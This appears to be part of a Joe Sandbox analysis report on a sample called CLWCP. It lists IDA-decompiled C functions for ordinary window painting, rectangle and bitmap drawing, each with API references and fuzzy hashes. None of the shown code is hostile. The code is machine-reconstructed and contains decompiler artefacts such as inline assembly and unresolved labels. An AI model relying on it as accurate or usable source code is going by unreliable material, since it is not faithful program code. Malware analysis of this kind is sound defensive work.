                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                  • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                  • API String ID: 1416857345-3736581797
                                  • Opcode ID: c1f6ee2bc01227a891c593df0bbf437d68cb65550a939cfbfb4b1d14e9f195bc
                                  • Instruction ID: c64f4e0d01e9818054fa7177533f64faec2168a63f556f3dd3b514976f2ba15f
                                  • Opcode Fuzzy Hash: c1f6ee2bc01227a891c593df0bbf437d68cb65550a939cfbfb4b1d14e9f195bc
                                  • Instruction Fuzzy Hash: FF1124B0204315AFE7149F65CC41B66B7E8EF44710F22443AB986AF2D1D6799C61CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 57%
                                  			E00428300(void* __eax, void* __ecx, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				struct HDC__* _v12;
                                  				struct tagRECT _v28;
                                  				struct tagRECT _v44;
                                  				char _v56;
                                  				char _v72;
                                  				signed char _t43;
                                  				struct HDC__* _t55;
                                  				void* _t74;
                                  				signed int _t77;
                                  				int _t78;
                                  				int _t79;
                                  				void* _t92;
                                  				intOrPtr _t105;
                                  				void* _t114;
                                  				void* _t117;
                                  				void* _t120;
                                  				void* _t122;
                                  				intOrPtr _t123;
                                  
                                  				_t120 = _t122;
                                  				_t123 = _t122 + 0xffffffbc;
                                  				_t92 = __ecx;
                                  				_v8 = __edx;
                                  				_t114 = __eax;
                                  				_t43 = GetWindowLongA(E0043BA58(_v8), 0xffffffec);
                                  				if((_t43 & 0x00000002) == 0) {
                                  					return _t43;
                                  				} else {
                                  					GetWindowRect(E0043BA58(_v8),  &_v44);
                                  					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
                                  					_t55 = E0043BA58(_v8);
                                  					_push(_t55);
                                  					L004067EC();
                                  					_v12 = _t55;
                                  					_push(_t120);
                                  					_push(0x42845b);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t123;
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_t117 = _t114;
                                  					if(_t92 != 0) {
                                  						_t77 = GetWindowLongA(E0043BA58(_v8), 0xfffffff0);
                                  						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
                                  							_t78 = GetSystemMetrics(2);
                                  							_t79 = GetSystemMetrics(3);
                                  							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                                  							E004128F0(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							_t117 = _t117;
                                  							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
                                  						}
                                  					}
                                  					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
                                  					E00427E9C( &_v56, 2);
                                  					E00427DF0(_t117,  &_v56, _v12, 0,  &_v44);
                                  					_pop(_t105);
                                  					 *[fs:eax] = _t105;
                                  					_push(0x428462);
                                  					_push(_v12);
                                  					_t74 = E0043BA58(_v8);
                                  					_push(_t74);
                                  					L00406944();
                                  					return _t74;
                                  				}
                                  			}























                                  APIs
                                  • GetWindowLongA.USER32 ref: 0042831B
                                  • GetWindowRect.USER32 ref: 00428336
                                  • OffsetRect.USER32(?,?,?), ref: 0042834B
                                  • 72E7B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428359
                                  • GetWindowLongA.USER32 ref: 0042838A
                                  • GetSystemMetrics.USER32 ref: 0042839F
                                  • GetSystemMetrics.USER32 ref: 004283A8
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 004283B7
                                  • GetSysColorBrush.USER32(0000000F), ref: 004283E4
                                  • FillRect.USER32 ref: 004283F2
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0042845B,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428417
                                  • 72E7B380.USER32(00000000,?,00428462,?,?,00000000,0042845B,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428455
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                  • String ID:
                                  • API String ID: 3936689491-0
                                  • Opcode ID: 2a7ee2e60d30e2d577557d2e56a907ea10492473a2cf377e106177e643b46db6
                                  • Instruction ID: 57993a5745ce5bd1c60f1d7df9515370e2aa4100a70a180ee87e358f7484cc49
                                  • Opcode Fuzzy Hash: 2a7ee2e60d30e2d577557d2e56a907ea10492473a2cf377e106177e643b46db6
                                  • Instruction Fuzzy Hash: 8E417271A00119AFCB00EBA9DD46EEFB7BDEF49314F10412AF905F3281CA799E058768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00425804(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                  				struct tagPOINT _v12;
                                  				int _v16;
                                  				struct tagRECT _v32;
                                  				struct tagRECT _v48;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t60;
                                  				int _t61;
                                  				RECT* _t64;
                                  				struct HDC__* _t65;
                                  
                                  				_t64 = _a8;
                                  				_t65 = _a4;
                                  				if( *0x470933 != 0) {
                                  					_t61 = 0;
                                  					if(_a12 == 0) {
                                  						L14:
                                  						return _t61;
                                  					}
                                  					_v32.left = 0;
                                  					_v32.top = 0;
                                  					_v32.right = GetSystemMetrics(0);
                                  					_v32.bottom = GetSystemMetrics(1);
                                  					if(_t65 == 0) {
                                  						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                  							L13:
                                  							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                  						} else {
                                  							_t61 = 1;
                                  						}
                                  						goto L14;
                                  					}
                                  					_v16 = GetClipBox(_t65,  &_v48);
                                  					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                  						goto L14;
                                  					}
                                  					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                  					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                  						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                  							goto L13;
                                  						}
                                  						if(_v16 == 1) {
                                  							_t61 = 1;
                                  						}
                                  						goto L14;
                                  					} else {
                                  						goto L13;
                                  					}
                                  				}
                                  				 *0x470920 = E0042525C(7, _t60,  *0x470920, _t64, _t65);
                                  				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                  				goto L14;
                                  			}
















                                  APIs
                                  • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042583D
                                  • GetSystemMetrics.USER32 ref: 00425862
                                  • GetSystemMetrics.USER32 ref: 0042586D
                                  • GetClipBox.GDI32(?,?), ref: 0042587F
                                  • GetDCOrgEx.GDI32(?,?), ref: 0042588C
                                  • OffsetRect.USER32(?,?,?), ref: 004258A5
                                  • IntersectRect.USER32 ref: 004258B6
                                  • IntersectRect.USER32 ref: 004258CC
                                    • Part of subcall function 0042525C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004252DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                  • String ID: EnumDisplayMonitors
                                  • API String ID: 362875416-2491903729
                                  • Opcode ID: b27db3c225871d1c03643b53e4a1f5b927304ab3e4ff9a8e849e83dd598a7467
                                  • Instruction ID: e2727030d81ebfaae0b5d2044e3438c5613764c08ae458e84395ae5835d28448
                                  • Opcode Fuzzy Hash: b27db3c225871d1c03643b53e4a1f5b927304ab3e4ff9a8e849e83dd598a7467
                                  • Instruction Fuzzy Hash: B4316DB2A0161DABDB00DBA5D844AEFB7FCAB48310F404127E915E2242E77899558BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E00439A78(intOrPtr* __eax, void* __edx) {
                                  				struct HDC__* _v8;
                                  				void* _v12;
                                  				void* _v16;
                                  				struct tagPAINTSTRUCT _v80;
                                  				intOrPtr _v84;
                                  				void* _v96;
                                  				struct HDC__* _v104;
                                  				void* _v112;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t38;
                                  				struct HDC__* _t47;
                                  				struct HDC__* _t55;
                                  				intOrPtr* _t83;
                                  				intOrPtr _t102;
                                  				void* _t103;
                                  				void* _t108;
                                  				void* _t111;
                                  				void* _t113;
                                  				intOrPtr _t114;
                                  
                                  				_t111 = _t113;
                                  				_t114 = _t113 + 0xffffff94;
                                  				_push(_t103);
                                  				_t108 = __edx;
                                  				_t83 = __eax;
                                  				if( *((char*)(__eax + 0x210)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
                                  					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E00438204(_t83) != 0) {
                                  						_t38 = E004394B4(_t83, _t83, _t108, _t103, _t108);
                                  					} else {
                                  						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
                                  					}
                                  					return _t38;
                                  				} else {
                                  					L004066E4();
                                  					 *((intOrPtr*)( *__eax + 0x44))();
                                  					 *((intOrPtr*)( *__eax + 0x44))();
                                  					_t47 = _v104;
                                  					L0040636C();
                                  					_v12 = _t47;
                                  					L00406944();
                                  					L00406374();
                                  					_v8 = _t47;
                                  					_v16 = SelectObject(_v8, _v12);
                                  					 *[fs:eax] = _t114;
                                  					_t55 = BeginPaint(E0043BA58(_t83),  &_v80);
                                  					E00435DE4(_t83, _v8, 0x14, _v8);
                                  					 *((intOrPtr*)(_t108 + 4)) = _v8;
                                  					E00439A78(_t83, _t108);
                                  					 *((intOrPtr*)(_t108 + 4)) = 0;
                                  					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x439bca, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
                                  					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
                                  					_push(_v104);
                                  					_push(0);
                                  					_push(0);
                                  					L0040634C();
                                  					EndPaint(E0043BA58(_t83),  &_v80);
                                  					_t102 = _t55;
                                  					 *[fs:eax] = _t102;
                                  					_push(0x439bd1);
                                  					SelectObject(_v8, _v16);
                                  					DeleteDC(_v8);
                                  					return DeleteObject(_v12);
                                  				}
                                  			}


























                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 00439AC3
                                  • 72E7A520.GDI32(00000000,?), ref: 00439AE7
                                  • 72E7B380.USER32(00000000,00000000,00000000,?), ref: 00439AF2
                                  • 72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 00439AF9
                                  • SelectObject.GDI32(0042C095,?), ref: 00439B09
                                  • BeginPaint.USER32(00000000,?,00000000,00439BCA,?,0042C095,?,00000000,00000000,00000000,00000000,?), ref: 00439B2B
                                  • 72E897E0.GDI32(00000000,00000000,00000000,?,?,0042C095,?,00000000,00000000,00000000,00000000,?), ref: 00439B87
                                  • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,0042C095,?,00000000,00000000,00000000,00000000,?), ref: 00439B98
                                  • SelectObject.GDI32(0042C095,?), ref: 00439BB2
                                  • DeleteDC.GDI32(0042C095), ref: 00439BBB
                                  • DeleteObject.GDI32(?), ref: 00439BC4
                                    • Part of subcall function 004394B4: BeginPaint.USER32(00000000,?,?,?,00000000), ref: 004394DF
                                    • Part of subcall function 004394B4: EndPaint.USER32(00000000,?,00439608,00000000), ref: 004395FB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
                                  • String ID:
                                  • API String ID: 3782911080-0
                                  • Opcode ID: f1af1dc31865d46e1ed7c6babf66c9387a02ac5e063a466a7c87fcf094983782
                                  • Instruction ID: e72070dadec6f266ba2dee52820db078d7f989e85616961c7ac405573a5467ab
                                  • Opcode Fuzzy Hash: f1af1dc31865d46e1ed7c6babf66c9387a02ac5e063a466a7c87fcf094983782
                                  • Instruction Fuzzy Hash: CE414F71B00244AFCB00EBA9CD85F9EB7F8AB48704F10547AB906EB381DAB9DD05CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00431760(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				char _v8;
                                  				void* _t29;
                                  				void* _t32;
                                  				void* _t38;
                                  				void* _t42;
                                  				void* _t46;
                                  				void* _t54;
                                  				signed int _t57;
                                  				struct HWND__* _t58;
                                  				intOrPtr* _t61;
                                  
                                  				_t61 =  &_v8;
                                  				_t29 =  *0x46ecf0; // 0x0
                                  				 *((intOrPtr*)(_t29 + 0x188)) = _a4;
                                  				if(IsWindowUnicode(_a4) == 0) {
                                  					_t32 =  *0x46ecf0; // 0x0
                                  					SetWindowLongA(_a4, 0xfffffffc,  *(_t32 + 0x194));
                                  					if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                  						SetWindowLongA(_a4, 0xfffffff4, _a4);
                                  					}
                                  				} else {
                                  					_t54 =  *0x46ecf0; // 0x0
                                  					_push( *((intOrPtr*)(_t54 + 0x194)));
                                  					_push(0xfffffffc);
                                  					_push(_a4);
                                  					L004069F4();
                                  					_push(0xfffffff0);
                                  					_t57 = _a4;
                                  					_push(_t57);
                                  					L004067FC();
                                  					if((_t57 & 0x40000000) != 0) {
                                  						_push(0xfffffff4);
                                  						_t58 = _a4;
                                  						_push(_t58);
                                  						L004067FC();
                                  						if(_t58 == 0) {
                                  							_push(_a4);
                                  							_push(0xfffffff4);
                                  							_push(_a4);
                                  							L004069F4();
                                  						}
                                  					}
                                  				}
                                  				_t38 =  *0x46ecf0; // 0x0
                                  				SetPropA(_a4,  *0x470aae & 0x0000ffff, _t38);
                                  				_t42 =  *0x46ecf0; // 0x0
                                  				SetPropA(_a4,  *0x470aac & 0x0000ffff, _t42);
                                  				_t46 =  *0x46ecf0; // 0x0
                                  				 *0x46ecf0 = 0;
                                  				_v8 =  *((intOrPtr*)(_t46 + 0x194))(_a4, _a8, _a12, _a16);
                                  				return  *_t61;
                                  			}














                                  APIs
                                  • IsWindowUnicode.USER32(?), ref: 0043177A
                                  • 72E7B5A0.USER32(?,000000FC,?,?), ref: 00431795
                                  • 72E7B110.USER32(?,000000F0,?,000000FC,?,?), ref: 004317A0
                                  • 72E7B110.USER32(?,000000F4,?,000000F0,?,000000FC,?,?), ref: 004317B2
                                  • 72E7B5A0.USER32(?,000000F4,?,?,000000F4,?,000000F0,?,000000FC,?,?), ref: 004317C5
                                  • SetWindowLongA.USER32 ref: 004317DE
                                  • GetWindowLongA.USER32 ref: 004317E9
                                  • GetWindowLongA.USER32 ref: 004317FB
                                  • SetWindowLongA.USER32 ref: 0043180E
                                  • SetPropA.USER32(?,00000000,00000000), ref: 00431825
                                  • SetPropA.USER32(?,00000000,00000000), ref: 0043183C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$Long$B110Prop$Unicode
                                  • String ID:
                                  • API String ID: 1632958030-0
                                  • Opcode ID: a4fd66b7268618f4525f225a95c4a95e6192e2d7872b353d1e6b3762c27ffc49
                                  • Instruction ID: 4d320b883aae1b298c964fffbdf92de92ef982c3d6f5d0821cdac3fab529cc75
                                  • Opcode Fuzzy Hash: a4fd66b7268618f4525f225a95c4a95e6192e2d7872b353d1e6b3762c27ffc49
                                  • Instruction Fuzzy Hash: 79312EB6500214BFDF10EF99DC85EAA37ECAB08364F104625FD29DB2E2D738D9509B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 81%
                                  			E0041E0E8(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, void* __fp0, intOrPtr _a4, int* _a8) {
                                  				intOrPtr* _v8;
                                  				intOrPtr* _v12;
                                  				int _v16;
                                  				int _v20;
                                  				int _v24;
                                  				long _v28;
                                  				long _v32;
                                  				struct HDC__* _v36;
                                  				intOrPtr* _v40;
                                  				void* _v44;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				struct HDC__* _t191;
                                  				int* _t196;
                                  				intOrPtr _t210;
                                  				int _t216;
                                  				int* _t218;
                                  				void* _t221;
                                  				void* _t223;
                                  				intOrPtr _t224;
                                  
                                  				_t198 = __ecx;
                                  				_t221 = _t223;
                                  				_t224 = _t223 + 0xffffffd8;
                                  				_v12 = __ecx;
                                  				_t218 = __edx;
                                  				_v8 = __eax;
                                  				_t196 = _a8;
                                  				if(_v12 != 0) {
                                  					E0041E554(_v8);
                                  					 *[fs:eax] = _t224;
                                  					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x41e391, _t221);
                                  					E0041E9AC(_v8, __ecx,  *0x41e3a4 & 0x000000ff);
                                  					E0041E554(E00422D98(_v12));
                                  					_push(_t221);
                                  					_push(0x41e36c);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t224;
                                  					_v20 = _t218[2] -  *_t218;
                                  					_v24 = _t218[3] - _t218[1];
                                  					_t216 = _t196[2] -  *_t196;
                                  					_v16 = _t196[3] - _t196[1];
                                  					if(E00422F70(_v12, _t198) != _a4) {
                                  						_v40 = E004227C4(1);
                                  						_t198 =  *_v40;
                                  						 *((intOrPtr*)( *_v40 + 8))();
                                  						E004230E4(_v40, _a4, __eflags, __fp0);
                                  						E0041E9AC(E00422D98(_v40),  *_v40,  *0x41e3a8 & 0x000000ff);
                                  						_v36 =  *((intOrPtr*)(E00422D98(_v40) + 4));
                                  						__eflags = 0;
                                  						_v44 = 0;
                                  					} else {
                                  						_v40 = 0;
                                  						_t191 =  *((intOrPtr*)( *_v12 + 0x68))();
                                  						_v44 = _t191;
                                  						_push(0);
                                  						L00406374();
                                  						_v36 = _t191;
                                  						_v44 = SelectObject(_v36, _v44);
                                  					}
                                  					_push(_t221);
                                  					_push(0x41e34a);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t224;
                                  					E0041E9AC(E00422D98(_v12), _t198,  *0x41e3a8 & 0x000000ff);
                                  					if(E0041DF8C( *((intOrPtr*)(_v8 + 0x14))) != 1) {
                                  						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24,  *(E00422D98(_v12) + 4),  *_t196, _t196[1], _t216, _v16, 0xcc0020);
                                  						_v32 = SetTextColor( *(_v8 + 4), 0);
                                  						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
                                  						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24, _v36,  *_t196, _t196[1], _t216, _v16, 0xe20746);
                                  						SetTextColor( *(_v8 + 4), _v32);
                                  						SetBkColor( *(_v8 + 4), _v28);
                                  					} else {
                                  						E0041EE84( *(_v8 + 4), _t196, _t218[1],  *_t218, _t216, _t218, _t196[1],  *_t196, _v36, _v16, _t216, _t196[1],  *_t196,  *(E00422D98(_v12) + 4), _v24, _v20);
                                  					}
                                  					_pop(_t210);
                                  					 *[fs:eax] = _t210;
                                  					_push(0x41e351);
                                  					if(_v40 == 0) {
                                  						__eflags = _v44;
                                  						if(_v44 != 0) {
                                  							SelectObject(_v36, _v44);
                                  						}
                                  						return DeleteDC(_v36);
                                  					} else {
                                  						return E00403398(_v40);
                                  					}
                                  				}
                                  				return __eax;
                                  			}

                                  APIs
                                    • Part of subcall function 0041E554: RtlEnterCriticalSection.KERNEL32(004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E55C
                                    • Part of subcall function 0041E554: RtlLeaveCriticalSection.KERNEL32(004708CC,004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E569
                                    • Part of subcall function 0041E554: RtlEnterCriticalSection.KERNEL32(00000038,004708CC,004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E572
                                  • 72E7A590.GDI32(00000000), ref: 0041E18C
                                  • SelectObject.GDI32(?,?), ref: 0041E19C
                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0041E296
                                  • SetTextColor.GDI32(?,00000000), ref: 0041E2A4
                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 0041E2B8
                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 0041E2EB
                                  • SetTextColor.GDI32(?,?), ref: 0041E2FB
                                  • SetBkColor.GDI32(?,?), ref: 0041E30B
                                  • SelectObject.GDI32(?,00000000), ref: 0041E33B
                                  • DeleteDC.GDI32(?), ref: 0041E344
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Color$CriticalSection$EnterObjectSelectStretchText$A590DeleteLeave
                                  • String ID:
                                  • API String ID: 2975480410-0
                                  • Opcode ID: 7cc31a96ad4f507255d28fe845969a21bf4d32e41b7a5e4bd06d8911856b7490
                                  • Instruction ID: f6335378c440144200d1eece051275da75abc03aecc9b6a0c341b4d61ac06291
                                  • Opcode Fuzzy Hash: 7cc31a96ad4f507255d28fe845969a21bf4d32e41b7a5e4bd06d8911856b7490
                                  • Instruction Fuzzy Hash: 6591C775A00118EFCB40DFA9C985E9EBBF8EF4D304B1544AAF918EB251C635ED40CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00439638(intOrPtr __eax, void* __ecx, struct HDC__* __edx) {
                                  				intOrPtr _v8;
                                  				struct HDC__* _v12;
                                  				int _v16;
                                  				intOrPtr _v20;
                                  				int _v24;
                                  				intOrPtr _v28;
                                  				struct tagRECT _v44;
                                  				intOrPtr _t117;
                                  				int _t120;
                                  				void* _t199;
                                  				int _t201;
                                  				intOrPtr _t227;
                                  				void* _t233;
                                  				void* _t234;
                                  				void* _t237;
                                  				void* _t238;
                                  				void* _t241;
                                  				void* _t243;
                                  				intOrPtr _t244;
                                  
                                  				_t241 = _t243;
                                  				_t244 = _t243 + 0xffffffd8;
                                  				_t199 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				if( *((char*)(_v8 + 0x1b0)) != 0 &&  *((char*)(_v8 + 0x1af)) != 0 &&  *((intOrPtr*)(_v8 + 0x184)) != 0) {
                                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x184)))) + 0x20))();
                                  				}
                                  				_t117 = _v8;
                                  				_t118 =  *((intOrPtr*)(_t117 + 0x1a0));
                                  				if( *((intOrPtr*)(_t117 + 0x1a0)) == 0) {
                                  					L17:
                                  					_t120 =  *(_v8 + 0x1a4);
                                  					if(_t120 != 0) {
                                  						_t233 =  *((intOrPtr*)(_t120 + 8)) - 1;
                                  						if(_t233 >= 0) {
                                  							_t234 = _t233 + 1;
                                  							_v16 = 0;
                                  							do {
                                  								_t120 = E00413D2C( *(_v8 + 0x1a4), _v16);
                                  								_t201 = _t120;
                                  								if( *((char*)(_t201 + 0x1ad)) != 0 && ( *(_t201 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t201 + 0x57)) != 0 || ( *(_t201 + 0x1c) & 0x00000010) != 0 && ( *(_t201 + 0x51) & 0x00000004) == 0)) {
                                  									_t237 = CreateSolidBrush(E0041D170(0xff000010));
                                  									E004128F0( *((intOrPtr*)(_t201 + 0x40)) - 1,  *((intOrPtr*)(_t201 + 0x40)) +  *((intOrPtr*)(_t201 + 0x48)),  *((intOrPtr*)(_t201 + 0x44)) - 1,  &_v44,  *((intOrPtr*)(_t201 + 0x44)) +  *((intOrPtr*)(_t201 + 0x4c)));
                                  									FrameRect(_v12,  &_v44, _t237);
                                  									DeleteObject(_t237);
                                  									_t238 = CreateSolidBrush(E0041D170(0xff000014));
                                  									E004128F0( *((intOrPtr*)(_t201 + 0x40)),  *((intOrPtr*)(_t201 + 0x40)) +  *((intOrPtr*)(_t201 + 0x48)) + 1,  *((intOrPtr*)(_t201 + 0x44)),  &_v44,  *((intOrPtr*)(_t201 + 0x44)) +  *((intOrPtr*)(_t201 + 0x4c)) + 1);
                                  									FrameRect(_v12,  &_v44, _t238);
                                  									_t120 = DeleteObject(_t238);
                                  								}
                                  								_v16 = _v16 + 1;
                                  								_t234 = _t234 - 1;
                                  							} while (_t234 != 0);
                                  						}
                                  					}
                                  					return _t120;
                                  				} else {
                                  					_v16 = 0;
                                  					if(_t199 != 0) {
                                  						_v16 = E00413D88(_t118, _t199);
                                  						if(_v16 < 0) {
                                  							_v16 = 0;
                                  						}
                                  					}
                                  					_v20 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1a0)) + 8));
                                  					while(_v16 < _v20) {
                                  						_v28 = E00413D2C( *((intOrPtr*)(_v8 + 0x1a0)), _v16);
                                  						if( *((char*)(_v28 + 0x57)) != 0 || ( *(_v28 + 0x1c) & 0x00000010) != 0 && ( *(_v28 + 0x51) & 0x00000004) == 0) {
                                  							E004128F0( *((intOrPtr*)(_v28 + 0x40)),  *((intOrPtr*)(_v28 + 0x40)) +  *(_v28 + 0x48),  *((intOrPtr*)(_v28 + 0x44)),  &_v44,  *((intOrPtr*)(_v28 + 0x44)) +  *(_v28 + 0x4c));
                                  							if(RectVisible(_v12,  &_v44) == 0) {
                                  								goto L16;
                                  							} else {
                                  								if(( *(_v8 + 0x54) & 0x00000080) != 0) {
                                  									 *(_v28 + 0x54) =  *(_v28 + 0x54) | 0x00000080;
                                  								}
                                  								_v24 = SaveDC(_v12);
                                  								_push(_t241);
                                  								_push(0x4397c6);
                                  								_push( *[fs:eax]);
                                  								 *[fs:eax] = _t244;
                                  								E004333E0(_v12,  *((intOrPtr*)(_v28 + 0x44)),  *((intOrPtr*)(_v28 + 0x40)));
                                  								IntersectClipRect(_v12, 0, 0,  *(_v28 + 0x48),  *(_v28 + 0x4c));
                                  								E00435DE4(_v28, _v12, 0xf, 0);
                                  								_pop(_t227);
                                  								 *[fs:eax] = _t227;
                                  								_push(0x4397cd);
                                  								return RestoreDC(_v12, _v24);
                                  							}
                                  						} else {
                                  							goto L16;
                                  						}
                                  						goto L28;
                                  						L16:
                                  						_v16 = _v16 + 1;
                                  					}
                                  					goto L17;
                                  				}
                                  				L28:
                                  			}

                                  APIs
                                  • RectVisible.GDI32(?,?), ref: 00439731
                                  • SaveDC.GDI32(?), ref: 00439754
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00439794
                                  • RestoreDC.GDI32(?,004395D8), ref: 004397C0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Rect$ClipIntersectRestoreSaveVisible
                                  • String ID:
